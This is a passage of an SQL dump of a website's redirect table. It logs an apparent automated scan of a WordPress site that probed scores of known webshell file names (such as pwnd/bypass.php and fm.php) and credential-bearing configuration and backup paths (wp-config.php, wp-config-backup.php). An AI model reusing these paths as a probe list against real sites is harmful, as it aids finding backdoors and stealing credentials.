00:00:00',301),(64520,'http://3s-technologies.com.tr/tr/wp-content/uploads/error.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/error.php','',1,0,'2026-05-09 13:14:16','0000-00-00 00:00:00',301),(64521,'http://3s-technologies.com.tr/tr/wp-content/text.php',NULL,'http://3s-technologies.com.tr/wp-content/text.php','',1,0,'2026-05-09 13:14:17','0000-00-00 00:00:00',301),(64522,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/lock.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/lock.php','',1,0,'2026-05-09 13:14:19','0000-00-00 00:00:00',301),(64523,'http://3s-technologies.com.tr/tr/wp-admin/zz.php',NULL,'http://3s-technologies.com.tr/wp-admin/zz.php','',1,0,'2026-05-09 13:14:20','0000-00-00 00:00:00',301),(64524,'http://3s-technologies.com.tr/tr/wp-admin/wp-signin.php',NULL,'http://3s-technologies.com.tr/wp-admin/wp-signin.php','',1,0,'2026-05-09 13:14:24','0000-00-00 00:00:00',301),(64525,'http://3s-technologies.com.tr/tr/wp-content/themes/wp-mail.phpp',NULL,'http://3s-technologies.com.tr/wp-content/themes/wp-mail.phpp','',1,0,'2026-05-09 13:14:25','0000-00-00 00:00:00',301),(64526,'http://3s-technologies.com.tr/tr/wp-admin/widgets-form-blocks-interface.php',NULL,'http://3s-technologies.com.tr/wp-admin/widgets-form-blocks-interface.php','',1,0,'2026-05-09 13:14:27','0000-00-00 00:00:00',301),(64527,'http://3s-technologies.com.tr/tr/wp-includes/blocks/nextpage/wp-cron.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/nextpage/wp-cron.php','',1,0,'2026-05-09 13:14:28','0000-00-00 00:00:00',301),(64528,'http://3s-technologies.com.tr/tr/wp-content/database.php',NULL,'http://3s-technologies.com.tr/wp-content/database.php','',1,0,'2026-05-09 13:14:29','0000-00-00 00:00:00',301),(64529,'http://3s-technologies.com.tr/tr/wp-content/text/about.php',NULL,'http://3s-technologies.com.tr/wp-content/Text/about.php','',1,0,'2026-05-09 13:14:32','0000-00-00 00:00:00',301),(64530,'http://3s-technologies.com.tr/tr/wp-content/js/about.php',NULL,'http://3s-technologies.com.tr/wp-content/js/about.php','',1,0,'2026-05-09 13:14:33','0000-00-00 00:00:00',301),(64531,'http://3s-technologies.com.tr/tr/wp-content/system_core.php',NULL,'http://3s-technologies.com.tr/wp-content/system_core.php','',1,0,'2026-05-09 13:14:35','0000-00-00 00:00:00',301),(64532,'http://3s-technologies.com.tr/tr/wp-includes/plugins/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/plugins/about.php','',1,0,'2026-05-09 13:14:39','0000-00-00 00:00:00',301),(64533,'http://3s-technologies.com.tr/tr/wp-includes/network/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/network/about.php','',1,0,'2026-05-09 13:14:40','0000-00-00 00:00:00',301),(64534,'http://3s-technologies.com.tr/tr/wp-content/srtdgd.php',NULL,'http://3s-technologies.com.tr/wp-content/srtdgd.php','',1,0,'2026-05-09 13:14:42','0000-00-00 00:00:00',301),(64535,'http://3s-technologies.com.tr/tr/wp-admin/js/advanc.php',NULL,'http://3s-technologies.com.tr/wp-admin/js/advanc.php','',1,0,'2026-05-09 13:14:42','0000-00-00 00:00:00',301),(64536,'http://3s-technologies.com.tr/tr/wp-admin/uploads/config.php',NULL,'http://3s-technologies.com.tr/wp-admin/uploads/config.php','',1,0,'2026-05-09 13:14:43','0000-00-00 00:00:00',301),(64537,'http://3s-technologies.com.tr/tr/wp-admin/home.php',NULL,'http://3s-technologies.com.tr/wp-admin/home.php','',1,0,'2026-05-09 13:14:44','0000-00-00 00:00:00',301),(64538,'http://3s-technologies.com.tr/tr/wp-admin/edit-tags-session.php',NULL,'http://3s-technologies.com.tr/wp-admin/edit-tags-session.php','',1,0,'2026-05-09 13:14:45','0000-00-00 00:00:00',301),(64539,'http://3s-technologies.com.tr/tr/wp-content/plugins/js_composer_theme/include/classes/vendors/plugins/login.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/js_composer_theme/include/classes/vendors/plugins/login.php','',1,0,'2026-05-09 13:14:46','0000-00-00 00:00:00',301),(64540,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/lib/php/plugins/api.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-file-manager/lib/php/plugins/api.php','',1,0,'2026-05-09 13:14:47','0000-00-00 00:00:00',301),(64541,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-mail.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-mail.php','',1,0,'2026-05-09 13:14:47','0000-00-00 00:00:00',301),(64542,'http://3s-technologies.com.tr/tr/wp-content/plugins/jetpack/extensions/plugins/load.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/jetpack/extensions/plugins/load.php','',1,0,'2026-05-09 13:14:48','0000-00-00 00:00:00',301),(64543,'http://3s-technologies.com.tr/tr/wp-content/plugins/loginpress/css/themes/wp-cron.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/loginpress/css/themes/wp-cron.php','',1,0,'2026-05-09 13:14:49','0000-00-00 00:00:00',301),(64544,'http://3s-technologies.com.tr/tr/wp-content/plugins/fileorganizer/manager/php/plugins/wp-load.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/fileorganizer/manager/php/plugins/wp-load.php','',1,0,'2026-05-09 13:14:50','0000-00-00 00:00:00',301),(64545,'http://3s-technologies.com.tr/tr/wp-content/themes/jupiter/assets/js/plugins/wp-signup.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/jupiter/assets/js/plugins/wp-signup.php','',1,0,'2026-05-09 13:14:50','0000-00-00 00:00:00',301),(64546,'http://3s-technologies.com.tr/tr/wp-content/uploads/xmlrpc.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/xmlrpc.php','',1,0,'2026-05-09 13:14:51','0000-00-00 00:00:00',301),(64547,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpress-seo/wp-seo-trigger.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wordpress-seo/wp-seo-trigger.php','',1,0,'2026-05-09 13:14:56','0000-00-00 00:00:00',301),(64548,'http://3s-technologies.com.tr/tr/wp-content/plugins/contact-form-7/admin/css/styles-rtl.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/contact-form-7/admin/css/styles-rtl.php','',1,0,'2026-05-09 13:14:57','0000-00-00 00:00:00',301),(64549,'http://3s-technologies.com.tr/tr/wp-content/themes/twentyfifteen/content-search.bar.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentyfifteen/content-search.bar.php','',1,0,'2026-05-09 13:14:58','0000-00-00 00:00:00',301),(64550,'http://3s-technologies.com.tr/tr/wp-content/themes/twentyfourteen/inc/widgets-core.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentyfourteen/inc/widgets-core.php','',1,0,'2026-05-09 13:14:59','0000-00-00 00:00:00',301),(64551,'http://3s-technologies.com.tr/tr/wp-includes/js/mediaelement/wp-mediaelement.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/mediaelement/wp-mediaelement.php','',1,0,'2026-05-09 13:14:59','0000-00-00 00:00:00',301),(64552,'http://3s-technologies.com.tr/tr/wp-includes/js/thickbox/class-menushelp.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/thickbox/class-menushelp.php','',1,0,'2026-05-09 13:15:00','0000-00-00 00:00:00',301),(64553,'http://3s-technologies.com.tr/tr/wp-includes/feed-data.php',NULL,'http://3s-technologies.com.tr/wp-includes/feed-data.php','',1,0,'2026-05-09 13:15:01','0000-00-00 00:00:00',301),(64554,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/header.item.php',NULL,'http://3s-technologies.com.tr/wp-includes/theme-compat/header.item.php','',1,0,'2026-05-09 13:15:02','0000-00-00 00:00:00',301),(64555,'http://3s-technologies.com.tr/tr/wp-includes/capabilities-json.php',NULL,'http://3s-technologies.com.tr/wp-includes/capabilities-json.php','',1,0,'2026-05-09 13:15:03','0000-00-00 00:00:00',301),(64556,'http://3s-technologies.com.tr/tr/wp-includes/id3/module.audio.ogg-data.php',NULL,'http://3s-technologies.com.tr/wp-includes/ID3/module.audio.ogg-data.php','',1,0,'2026-05-09 13:15:03','0000-00-00 00:00:00',301),(64557,'http://3s-technologies.com.tr/tr/wp-includes/widgets/class-wp-widget-calendar-js.php',NULL,'http://3s-technologies.com.tr/wp-includes/widgets/class-wp-widget-calendar-js.php','',1,0,'2026-05-09 13:15:04','0000-00-00 00:00:00',301),(64558,'http://3s-technologies.com.tr/tr/wp-includes/lib.php',NULL,'http://3s-technologies.com.tr/wp-includes/lib.php','',1,0,'2026-05-09 13:15:06','0000-00-00 00:00:00',301),(64559,'http://3s-technologies.com.tr/tr/wp-includes/requests/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/Requests/config.php','',1,0,'2026-05-09 13:15:08','0000-00-00 00:00:00',301),(64560,'http://3s-technologies.com.tr/tr/wp-includes/blocks/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/config.php','',1,0,'2026-05-09 13:15:09','0000-00-00 00:00:00',301),(64561,'http://3s-technologies.com.tr/tr/wp-includes/settings.php',NULL,'http://3s-technologies.com.tr/wp-includes/settings.php','',1,0,'2026-05-09 13:15:10','0000-00-00 00:00:00',301),(64562,'http://3s-technologies.com.tr/tr/wp-includes/images/wp-load.php',NULL,'http://3s-technologies.com.tr/wp-includes/images/wp-load.php','',1,0,'2026-05-09 13:15:12','0000-00-00 00:00:00',301),(64563,'http://3s-technologies.com.tr/tr/wp-includes/images/media/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/images/media/config.php','',1,0,'2026-05-09 13:15:14','0000-00-00 00:00:00',301),(64564,'http://3s-technologies.com.tr/tr/wp-admin/images/cap.php',NULL,'http://3s-technologies.com.tr/wp-admin/images/Cap.php','',1,0,'2026-05-09 13:15:17','0000-00-00 00:00:00',301),(64565,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/theme-compat/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/theme-compat/theme-compat/config.php','',1,0,'2026-05-09 13:15:18','0000-00-00 00:00:00',301),(64566,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/theme-compat/config.php','',1,0,'2026-05-09 13:15:19','0000-00-00 00:00:00',301),(64567,'http://3s-technologies.com.tr/tr/wp-includes/wp-config.php',NULL,'http://3s-technologies.com.tr/wp-includes/wp-config.php','',1,0,'2026-05-09 13:15:21','0000-00-00 00:00:00',301),(64568,'http://3s-technologies.com.tr/tr/wp-includes/certificates/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/certificates/config.php','',1,0,'2026-05-09 13:15:22','0000-00-00 00:00:00',301),(64569,'http://3s-technologies.com.tr/tr/wp-includes/js/dist/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/dist/config.php','',1,0,'2026-05-09 13:15:23','0000-00-00 00:00:00',301),(64570,'http://3s-technologies.com.tr/tr/wp-includes/js/wp-load.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/wp-load.php','',1,0,'2026-05-09 13:15:23','0000-00-00 00:00:00',301),(64571,'http://3s-technologies.com.tr/tr/wp-includes/js/imgareaselect/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/imgareaselect/config.php','',1,0,'2026-05-09 13:15:24','0000-00-00 00:00:00',301),(64572,'http://3s-technologies.com.tr/tr/wp-includes/js/login.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/login.php','',1,0,'2026-05-09 13:15:25','0000-00-00 00:00:00',301),(64573,'http://3s-technologies.com.tr/tr/wp-includes/js/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/config.php','',1,0,'2026-05-09 13:15:26','0000-00-00 00:00:00',301),(64574,'http://3s-technologies.com.tr/tr/wp-includes/js/jcrop/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/jcrop/config.php','',1,0,'2026-05-09 13:15:27','0000-00-00 00:00:00',301),(64575,'http://3s-technologies.com.tr/tr/wp-includes/js/wp-config.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/wp-config.php','',1,0,'2026-05-09 13:15:28','0000-00-00 00:00:00',301),(64576,'http://3s-technologies.com.tr/tr/wp-includes/fonts/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/fonts/config.php','',1,0,'2026-05-09 13:15:29','0000-00-00 00:00:00',301),(64577,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/search/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/rest-api/search/config.php','',1,0,'2026-05-09 13:15:31','0000-00-00 00:00:00',301),(64578,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/endpoints/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/rest-api/endpoints/config.php','',1,0,'2026-05-09 13:15:32','0000-00-00 00:00:00',301),(64579,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/login.php',NULL,'http://3s-technologies.com.tr/wp-includes/rest-api/login.php','',1,0,'2026-05-09 13:15:33','0000-00-00 00:00:00',301),(64580,'http://3s-technologies.com.tr/tr/wp-includes/random_compat/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/random_compat/config.php','',1,0,'2026-05-09 13:15:34','0000-00-00 00:00:00',301),(64581,'http://3s-technologies.com.tr/tr/wp-includes/init.php',NULL,'http://3s-technologies.com.tr/wp-includes/init.php','',1,0,'2026-05-09 13:15:35','0000-00-00 00:00:00',301),(64582,'http://3s-technologies.com.tr/tr/wp-content/backup-migration/config.php',NULL,'http://3s-technologies.com.tr/wp-content/backup-migration/config.php','',1,0,'2026-05-09 13:15:38','0000-00-00 00:00:00',301),(64583,'http://3s-technologies.com.tr/tr/wp-content/uploads/redux',NULL,'http://3s-technologies.com.tr/wp-content/uploads/redux/','',1,0,'2026-05-09 13:15:38','0000-00-00 00:00:00',301),(64584,'http://3s-technologies.com.tr/tr/wp-content/languages/themes/config.php',NULL,'http://3s-technologies.com.tr/wp-content/languages/themes/config.php','',1,0,'2026-05-09 13:15:39','0000-00-00 00:00:00',301),(64585,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd/bypass.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/pwnd/bypass.php','',1,0,'2026-05-09 13:15:41','0000-00-00 00:00:00',301),(64586,'http://3s-technologies.com.tr/tr/wp-content/plugins/config.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/config.php','',1,0,'2026-05-09 13:15:42','0000-00-00 00:00:00',301),(64587,'http://3s-technologies.com.tr/tr/wp-content/plugins/login.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/login.php','',1,0,'2026-05-09 13:15:43','0000-00-00 00:00:00',301),(64588,'http://3s-technologies.com.tr/tr/wp-content/themes/config.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/config.php','',1,0,'2026-05-09 13:15:44','0000-00-00 00:00:00',301),(64589,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwenty/assets/js',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwenty/assets/js/','',1,0,'2026-05-09 13:15:47','0000-00-00 00:00:00',301),(64590,'http://3s-technologies.com.tr/tr/wp-includes/webix.php',NULL,'http://3s-technologies.com.tr/wp-includes/webix.php','',1,0,'2026-05-09 13:15:51','0000-00-00 00:00:00',301),(64591,'http://3s-technologies.com.tr/tr/wp-content/uploads/ms-files.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/ms-files.php','',1,0,'2026-05-09 13:15:51','0000-00-00 00:00:00',301),(64592,'http://3s-technologies.com.tr/tr/wp-content/uploads/edit.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/edit.php','',1,0,'2026-05-09 13:15:53','0000-00-00 00:00:00',301),(64593,'http://3s-technologies.com.tr/tr/wp-admin/wp-mail.php',NULL,'http://3s-technologies.com.tr/wp-admin/wp-mail.php','',1,0,'2026-05-09 13:15:56','0000-00-00 00:00:00',301),(64594,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-multilang/configs/plugins/users.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-multilang/configs/plugins/users.php','',1,0,'2026-05-09 13:15:57','0000-00-00 00:00:00',301),(64595,'http://3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/plugins/maintenance.php',NULL,'http://3s-technologies.com.tr/wp-content/upgrade-temp-backup/plugins/maintenance.php','',1,0,'2026-05-09 13:15:58','0000-00-00 00:00:00',301),(64596,'http://3s-technologies.com.tr/tr/wp-includes/blocks/columns',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/columns/','',1,0,'2026-05-09 13:15:59','0000-00-00 00:00:00',301),(64597,'http://3s-technologies.com.tr/tr/wp-content/themes/news-portal/fm.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/news-portal/fm.php','',1,0,'2026-05-09 13:16:01','0000-00-00 00:00:00',301),(64598,'http://3s-technologies.com.tr/tr/wp-includes/assets/koiy.php',NULL,'http://3s-technologies.com.tr/wp-includes/assets/koiy.php','',1,0,'2026-05-09 13:16:02','0000-00-00 00:00:00',301),(64599,'http://3s-technologies.com.tr/tr/wp-includes/bk/database.php',NULL,'http://3s-technologies.com.tr/wp-includes/bk/database.php','',1,0,'2026-05-09 13:16:05','0000-00-00 00:00:00',301),(64600,'http://3s-technologies.com.tr/tr/wp-includes/configriv/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/configRIV/about.php','',1,0,'2026-05-09 13:16:06','0000-00-00 00:00:00',301),(64601,'http://3s-technologies.com.tr/tr/wp-includes/home.php',NULL,'http://3s-technologies.com.tr/wp-includes/home.php','',1,0,'2026-05-09 13:16:07','0000-00-00 00:00:00',301),(64602,'http://3s-technologies.com.tr/tr/wp-content/well-known/about.php',NULL,'http://3s-technologies.com.tr/wp-content/well-known/about.php','',1,0,'2026-05-09 13:16:07','0000-00-00 00:00:00',301),(64603,'http://3s-technologies.com.tr/tr/wp-content/plugins/updraftplus/system_core.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/updraftplus/system_core.php','',1,0,'2026-05-09 13:16:10','0000-00-00 00:00:00',301),(64604,'http://3s-technologies.com.tr/tr/wp-content/plugins/xc.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/xc.php','',1,0,'2026-05-09 13:16:11','0000-00-00 00:00:00',301),(64605,'http://3s-technologies.com.tr/tr/well-known/acme-challenge/about.php',NULL,'http://3s-technologies.com.tr/well-known/acme-challenge/about.php','',1,0,'2026-05-09 13:16:12','0000-00-00 00:00:00',301),(64606,'http://3s-technologies.com.tr/tr/well-known/about.php',NULL,'http://3s-technologies.com.tr/well-known/about.php','',1,0,'2026-05-09 13:16:13','0000-00-00 00:00:00',301),(64607,'http://3s-technologies.com.tr/tr/database/database.php',NULL,'http://3s-technologies.com.tr/database/database.php','',1,0,'2026-05-09 13:16:14','0000-00-00 00:00:00',301),(64608,'http://3s-technologies.com.tr/tr/wp-content/themes/content.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/content.php','',1,0,'2026-05-09 13:16:17','0000-00-00 00:00:00',301),(64609,'http://3s-technologies.com.tr/tr/ws63.php',NULL,'http://3s-technologies.com.tr/ws63.php','',1,0,'2026-05-09 13:16:17','0000-00-00 00:00:00',301),(64610,'http://3s-technologies.com.tr/tr/wp-includesxc/js/imgareaselect/zo.php',NULL,'http://3s-technologies.com.tr/wp-includesxc/js/imgareaselect/zo.php','',1,0,'2026-05-09 13:16:18','0000-00-00 00:00:00',301),(64611,'http://3s-technologies.com.tr/tr/wp-content/themes/astra/inc/builder/type/header/above-header/assets/js',NULL,'http://3s-technologies.com.tr/wp-content/themes/astra/inc/builder/type/header/above-header/assets/js/','',1,0,'2026-05-09 13:16:19','0000-00-00 00:00:00',301),(64612,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/light/wp-admin.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/light/wp-admin.php','',1,0,'2026-05-09 13:16:21','0000-00-00 00:00:00',301),(64613,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp2epub/css',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp2epub/css/','',1,0,'2026-05-09 13:16:22','0000-00-00 00:00:00',301),(64614,'http://3s-technologies.com.tr/tr/wp-content/plugins_old1/insert-headers-and-footers',NULL,'http://3s-technologies.com.tr/wp-content/plugins_old1/insert-headers-and-footers/','',1,0,'2026-05-09 13:16:23','0000-00-00 00:00:00',301),(64615,'http://3s-technologies.com.tr/tr/wp-includes/sc.php',NULL,'http://3s-technologies.com.tr/wp-includes/sc.php','',1,0,'2026-05-09 13:16:24','0000-00-00 00:00:00',301),(64616,'http://3s-technologies.com.tr/tr/wp-content/wp-at.php',NULL,'http://3s-technologies.com.tr/wp-content/wp-at.php','',1,0,'2026-05-09 13:16:26','0000-00-00 00:00:00',301),(64617,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/100.php',NULL,'http://3s-technologies.com.tr/wp-includes/block-supports/100.php','',1,0,'2026-05-09 13:16:28','0000-00-00 00:00:00',301),(64618,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/dx.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/blue/dx.php','',1,0,'2026-05-09 13:16:29','0000-00-00 00:00:00',301),(64619,'http://3s-technologies.com.tr/tr/wp-admin/maint/src/xth',NULL,'http://3s-technologies.com.tr/wp-admin/maint/src/xth/','',1,0,'2026-05-09 13:16:30','0000-00-00 00:00:00',301),(64620,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/sunrise/modules/docs/dist/resources/qnl/admin.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/sunrise/modules/docs/dist/resources/qnl/admin.php','',1,0,'2026-05-09 13:16:31','0000-00-00 00:00:00',301),(64621,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/includes/src/content/ixp',NULL,'http://3s-technologies.com.tr/wp-includes/block-supports/includes/src/content/ixp/','',1,0,'2026-05-09 13:16:31','0000-00-00 00:00:00',301),(64622,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/js/includes/pwm/admin.php',NULL,'http://3s-technologies.com.tr/wp-includes/sodium_compat/src/js/includes/pwm/admin.php','',1,0,'2026-05-09 13:16:32','0000-00-00 00:00:00',301),(64623,'http://3s-technologies.com.tr/tr/wp-content/themes/divi/core/code-snippets/post/type',NULL,'http://3s-technologies.com.tr/wp-content/themes/Divi/core/code-snippets/post/type/','',1,0,'2026-05-09 13:16:34','0000-00-00 00:00:00',301),(64624,'http://3s-technologies.com.tr/tr/wp-content/themes/divi/epanel/build',NULL,'http://3s-technologies.com.tr/wp-content/themes/Divi/epanel/build/','',1,0,'2026-05-09 13:16:35','0000-00-00 00:00:00',301),(64625,'http://3s-technologies.com.tr/tr/wp-content/themes/divi/includes/builder/frontend-builder/assets/vendors/skins/lightgray',NULL,'http://3s-technologies.com.tr/wp-content/themes/Divi/includes/builder/frontend-builder/assets/vendors/skins/lightgray/','',1,0,'2026-05-09 13:16:35','0000-00-00 00:00:00',301),(64626,'http://3s-technologies.com.tr/tr/scanner3.php',NULL,'http://3s-technologies.com.tr/scanner3.php','',1,0,'2026-05-09 13:16:37','0000-00-00 00:00:00',301),(64627,'http://3s-technologies.com.tr/tr/wp-admin/user/blue',NULL,'http://3s-technologies.com.tr/wp-admin/user/blue/','',1,0,'2026-05-09 13:16:41','0000-00-00 00:00:00',301),(64628,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/ixr',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/blue/IXR/','',1,0,'2026-05-09 13:16:42','0000-00-00 00:00:00',301),(64629,'http://3s-technologies.com.tr/tr/wp-admin/network/id3',NULL,'http://3s-technologies.com.tr/wp-admin/network/ID3/','',1,0,'2026-05-09 13:16:44','0000-00-00 00:00:00',301),(64630,'http://3s-technologies.com.tr/tr/wp-includes/interactivity-api/certificates',NULL,'http://3s-technologies.com.tr/wp-includes/interactivity-api/certificates/','',1,0,'2026-05-09 13:16:44','0000-00-00 00:00:00',301),(64631,'http://3s-technologies.com.tr/tr/wp-content/tmp-old/plugins-old-old',NULL,'http://3s-technologies.com.tr/wp-content/tmp-old/plugins-old-old/','',1,0,'2026-05-09 13:16:47','0000-00-00 00:00:00',301),(64632,'http://3s-technologies.com.tr/tr/wp-content/plugins.nulled/metform/user',NULL,'http://3s-technologies.com.tr/wp-content/plugins.nulled/metform/user/','',1,0,'2026-05-09 13:16:49','0000-00-00 00:00:00',301),(64633,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/sidebar-schema.php',NULL,'http://3s-technologies.com.tr/wp-includes/theme-compat/sidebar-schema.php','',1,0,'2026-05-09 13:16:50','0000-00-00 00:00:00',301),(64634,'http://3s-technologies.com.tr/tr/wp-includes/interactivity-api/class-wp-interactivity-api-directives-processor-loop.php',NULL,'http://3s-technologies.com.tr/wp-includes/interactivity-api/class-wp-interactivity-api-directives-processor-loop.php','',1,0,'2026-05-09 13:16:51','0000-00-00 00:00:00',301),(64635,'http://3s-technologies.com.tr/tr/wp-includes/id3/module.audio.flac-restful.php',NULL,'http://3s-technologies.com.tr/wp-includes/ID3/module.audio.flac-restful.php','',1,0,'2026-05-09 13:16:51','0000-00-00 00:00:00',301),(64636,'http://3s-technologies.com.tr/tr/wp-includes/link-template-edit.php',NULL,'http://3s-technologies.com.tr/wp-includes/link-template-edit.php','',1,0,'2026-05-09 13:16:52','0000-00-00 00:00:00',301),(64637,'http://3s-technologies.com.tr/tr/wp-includes/customize/class-wp-customize-new-menu-section-schema.php',NULL,'http://3s-technologies.com.tr/wp-includes/customize/class-wp-customize-new-menu-section-schema.php','',1,0,'2026-05-09 13:16:53','0000-00-00 00:00:00',301),(64638,'http://3s-technologies.com.tr/tr/wp-includes/robots-template-client.php',NULL,'http://3s-technologies.com.tr/wp-includes/robots-template-client.php','',1,0,'2026-05-09 13:16:55','0000-00-00 00:00:00',301),(64639,'http://3s-technologies.com.tr/tr/wp-includes/assets/script-loader-react-refresh-entry.min-variable.php',NULL,'http://3s-technologies.com.tr/wp-includes/assets/script-loader-react-refresh-entry.min-variable.php','',1,0,'2026-05-09 13:16:56','0000-00-00 00:00:00',301),(64640,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-customize-section-less.php',NULL,'http://3s-technologies.com.tr/wp-includes/class-wp-customize-section-less.php','',1,0,'2026-05-09 13:16:57','0000-00-00 00:00:00',301),(64641,'http://3s-technologies.com.tr/tr/wp-includes/class-wpdb-query.php',NULL,'http://3s-technologies.com.tr/wp-includes/class-wpdb-query.php','',1,0,'2026-05-09 13:16:59','0000-00-00 00:00:00',301),(64642,'http://3s-technologies.com.tr/tr/wp-includes/widgets/class-wp-widget-meta-restful.php',NULL,'http://3s-technologies.com.tr/wp-includes/widgets/class-wp-widget-meta-restful.php','',1,0,'2026-05-09 13:16:59','0000-00-00 00:00:00',301),(64643,'http://3s-technologies.com.tr/tr/wp-admin/menu-sql.php',NULL,'http://3s-technologies.com.tr/wp-admin/menu-sql.php','',1,0,'2026-05-09 13:17:00','0000-00-00 00:00:00',301),(64644,'http://3s-technologies.com.tr/tr/wp-admin/network/index-request.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/index-request.php','',1,0,'2026-05-09 13:17:01','0000-00-00 00:00:00',301),(64645,'http://3s-technologies.com.tr/tr/wp-admin/themes-security.php',NULL,'http://3s-technologies.com.tr/wp-admin/themes-security.php','',1,0,'2026-05-09 13:17:02','0000-00-00 00:00:00',301),(64646,'http://3s-technologies.com.tr/tr/wp-admin/includes/network-url.php',NULL,'http://3s-technologies.com.tr/wp-admin/includes/network-url.php','',1,0,'2026-05-09 13:17:03','0000-00-00 00:00:00',301),(64647,'http://3s-technologies.com.tr/tr/wp-content/plugins/app.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/app.php','',1,0,'2026-05-09 13:17:04','0000-00-00 00:00:00',301),(64648,'http://3s-technologies.com.tr/tr/wp-admin/network/config.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/config.php','',1,0,'2026-05-09 13:17:07','0000-00-00 00:00:00',301),(64649,'http://3s-technologies.com.tr/tr/wp-admin/wp-config-backup.php',NULL,'http://3s-technologies.com.tr/wp-admin/wp-config-backup.php','',1,0,'2026-05-09 13:17:08','0000-00-00 00:00:00',301),(64650,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpress-seo/css/dist/admin-global-350-rtl.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wordpress-seo/css/dist/admin-global-350-rtl.php','',1,0,'2026-05-09 13:17:10','0000-00-00 00:00:00',301),(64651,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/block-directory/222.php',NULL,'http://3s-technologies.com.tr/wp-includes/css/dist/block-directory/222.php','',1,0,'2026-05-09 13:17:11','0000-00-00 00:00:00',301),(64652,'https://3s-technologies.com.tr/tr/asset-manifest.json',NULL,'https://3s-technologies.com.tr/asset-manifest.json','',4,0,'2026-05-10 05:33:14','0000-00-00 00:00:00',301),(64653,'https://3s-technologies.com.tr/tr/build-manifest.json',NULL,'https://3s-technologies.com.tr/build-manifest.json','',3,0,'2026-05-10 05:33:18','0000-00-00 00:00:00',301),(64654,'https://3s-technologies.com.tr/tr/_next/static/buildmanifest.js',NULL,'https://3s-technologies.com.tr/_next/static/buildManifest.js','',3,0,'2026-05-10 05:33:20','0000-00-00 00:00:00',301),(64655,'https://3s-technologies.com.tr/tr/_next/build-manifest.json',NULL,'https://3s-technologies.com.tr/_next/build-manifest.json','',3,0,'2026-05-10 05:33:22','0000-00-00 